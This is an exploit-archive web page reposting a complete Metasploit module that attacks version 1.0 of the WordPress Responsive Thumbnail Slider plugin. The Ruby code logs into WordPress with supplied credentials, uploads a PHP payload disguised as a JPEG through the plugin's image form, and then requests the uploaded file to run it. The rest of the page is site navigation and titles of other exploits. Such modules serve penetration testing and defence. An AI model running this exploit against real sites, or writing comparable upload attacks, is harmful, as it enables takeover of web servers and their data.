首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit
来源:metasploit.com 作者:Pace 发布时间:2018-07-30  

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
        Plugin v1.0 for WordPress post authentication.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Arash Khazaei', # EDB PoC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'     =>
        [
          [ 'EDB', '37998' ]
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 28 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
        OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
        OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
      ])
  end

  def check
    # The version regex found in extract_and_check_version does not work for this plugin's
    # readme.txt, so we build a custom one.
    check_code = check_version || check_plugin_path
    if check_code
      return check_code
    else
      return CheckCode::Safe
    end
  end

  def check_version
    plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')

    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  plugin_uri
    )

    if res && res.body && res.body =~ /Version:([\d\.]+)/
      version = Gem::Version.new($1)
      if version <= Gem::Version.new('1.0')
        vprint_status("Plugin version found: #{version}")
        return CheckCode::Appears
      end
    end

    nil
  end

  def check_plugin_path
    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')

    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  plugin_uri
    )

    if res && res.code == 200
      vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
      return CheckCode::Detected
    end

    nil
  end

  def login
    auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies

    store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)

    print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
    auth_cookies
  end

  def upload_payload(cookies)
    manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
    file_payload = get_write_exec_payload(:unlink_self => true)
    file_name = "#{rand_text_alpha(5)}.php"

    # attempt to access plugins page
    plugin_res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  normalize_uri(target_uri.path, manage_uri),
      'cookie'  =>  cookies
    )

    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
    end

    data = Rex::MIME::Message.new
    data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
    data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
    data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
    post_data = data.to_s

    # upload the file
    upload_res = send_request_cgi(
      'method'  =>  'POST',
      'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
      'cookie'  =>  cookies,
      'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
      'data'    =>  post_data
    )

    page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
    fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)

    retrieve_file(page, cookies)
  end

  def retrieve_file(res, cookies)
    fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
    fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
    file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")

    print_good("Successful upload")
    send_request_cgi(
      'uri' => file_uri,
      'method' => 'GET',
      'cookie' => cookies
    )
  end

  def exploit
   unless check == CheckCode::Safe
     auth_cookies = login
     upload_payload(auth_cookies)
   end
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetScanTools Basic Edition 2.5
·ipPulse 1.92 - 'IP Address/Hos
·QNap QVR Client 5.1.1.30070 -
·ipPulse 1.92 Denial Of Service
·Core FTP 2.0 - 'XRMD' Denial o
·Allok MOV Converter 4.6.1217 B
·Inteno’s IOPSYS - (Authentica
·Microsoft Windows Kernel win32
·FTPShell Client 5.22 Remote Bu
·H2 Database 1.4.197 Informatio
·Axis Network Camera Remote Com
·fusermount Restriction Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved